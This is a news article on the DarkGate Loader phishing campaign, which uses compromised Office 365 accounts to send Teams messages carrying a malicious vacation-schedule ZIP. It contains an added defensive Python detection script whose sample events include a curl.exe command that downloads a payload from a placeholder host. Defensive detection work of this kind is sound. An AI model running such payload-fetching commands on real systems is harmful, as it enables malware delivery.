What you need to know
- Hackers are leveraging a new phishing campaign dubbed 'DarkGate Loader' to compromise Microsoft Teams accounts.
- The technique is designed to dupe unsuspecting users into downloading and opening .ZIP files marked 'Changes to the vacation schedule' onto their devices.
- The disguised download process uses Windows cURL, and the pre-compiled script makes it harder to spot the malware since the code is hidden.
Hackers are leveraging sophisticated techniques to dupe and lure unsuspecting users into their malicious attacks. Toward the end of August, Truesec's research team started investigating a new process dubbed 'DarkGate Loader.'
This phishing campaign sends seemingly harmless messages to Microsoft Teams users. The hackers used compromised Office 365 accounts to send messages with harmful attachments to unsuspecting users to trick them into downloading and opening ZIP files marked 'Changes to the vacation schedule.'
Truesec highlighted the hijacked accounts used by the hackers: "Akkaravit Tattamanas" (firstname.lastname@example.org) and "ABNER DAVID RIVERA ROJAS" (email@example.com). The messages carried a malicious VBScript lurking inside an LNK file, which in turn deploys the malware known as DarkGate Loader.
The campaign makes foul play extremely difficult for users to detect, since the ZIP file is downloaded from a SharePoint URL. Moreover, the pre-compiled script makes the malware harder to spot because the malicious code is hidden in the middle of the file.
According to the research firm, the script can also identify whether the target user has Sophos, a popular antivirus, installed on their endpoint. If it's not installed, the additional code is unmasked and shellcode is launched, which leverages a technique dubbed 'stacked strings' to construct the DarkGate executable and load it into system memory.
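A defender-side detection heuristic for the chain described above (script host launching Windows cURL, and the lure archive name on a command line), added here as an example; it is not part of the original article or Truesec's research, and the event records, field names and placeholder URL are all constructed:

```python
"""Flag the DarkGate Loader delivery pattern in process-creation events.

Constructed example.  Events use an assumed, simplified Sysmon-like shape
(pid, ppid, image, cmdline).  Two signals are checked: a script host
(wscript/cscript) spawning curl.exe, and the lure archive name on any
command line.  Child events must appear after their parents.
"""
from dataclasses import dataclass

@dataclass
class Event:
    pid: int
    ppid: int
    image: str      # full image path of the new process
    cmdline: str    # command line of the new process

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
LURE_NAME = "changes to the vacation schedule"   # from the reported lure

def basename(path: str) -> str:
    """Return the lower-cased file name from a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def find_darkgate_chain(events):
    """Return a list of alert strings, one per suspicious event."""
    by_pid = {e.pid: e for e in events}
    alerts = []
    for e in events:
        parent = by_pid.get(e.ppid)
        # Signal 1: VBScript host pulling a payload with the built-in curl.exe
        if basename(e.image) == "curl.exe" and parent and basename(parent.image) in SCRIPT_HOSTS:
            alerts.append(f"{basename(parent.image)} (pid {parent.pid}) spawned curl.exe "
                          f"(pid {e.pid}): {e.cmdline}")
        # Signal 2: the lure archive name anywhere on a command line
        if LURE_NAME in e.cmdline.lower():
            alerts.append(f"lure archive name on command line of pid {e.pid}: {e.cmdline}")
    return alerts

# Constructed sample events; the download URL is a placeholder.
SAMPLE_EVENTS = [
    Event(200, 1, r"C:\Windows\explorer.exe",
          r'explorer.exe "C:\Users\u\Downloads\Changes to the vacation schedule.zip"'),
    Event(300, 200, r"C:\Windows\System32\wscript.exe", r'wscript.exe "C:\Users\u\AppData\Local\Temp\x.vbs"'),
    Event(400, 300, r"C:\Windows\System32\curl.exe", r"curl.exe -o C:\Temp\a.au3 http://PLACEHOLDER.example/a"),
    Event(500, 1, r"C:\Windows\System32\cmd.exe", "cmd.exe /c curl.exe https://example.org"),   # benign
    Event(510, 500, r"C:\Windows\System32\curl.exe", "curl.exe https://example.org"),          # benign
]

if __name__ == "__main__":
    for alert in find_darkgate_chain(SAMPLE_EVENTS):
        print("ALERT:", alert)
```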
It's not the only Teams-related scam: a group of Russian hackers named Midnight Blizzard recently leveraged a new exploit that affected fewer than 40 organizations in August. The hackers used previously compromised Microsoft 365 tenants belonging to small business owners to create new domains that purport to be technical support entities. Microsoft has since mitigated the issue and is currently investigating the attack's impact.
For now, you should remain vigilant to unexpected messages and alert your administrator if you identify this infected file.
Kevin Okemwa is a seasoned tech journalist based in Nairobi, Kenya with lots of experience covering the latest trends and developments in the industry. With a passion for innovation and a keen eye for detail, he has written for leading publications such as OnMSFT, MakeUseOf, and Windows Report, providing insightful analysis and breaking news on everything revolving around the Microsoft ecosystem. While AFK and not busy following the ever-emerging trends in tech, you can find him exploring the world or listening to music.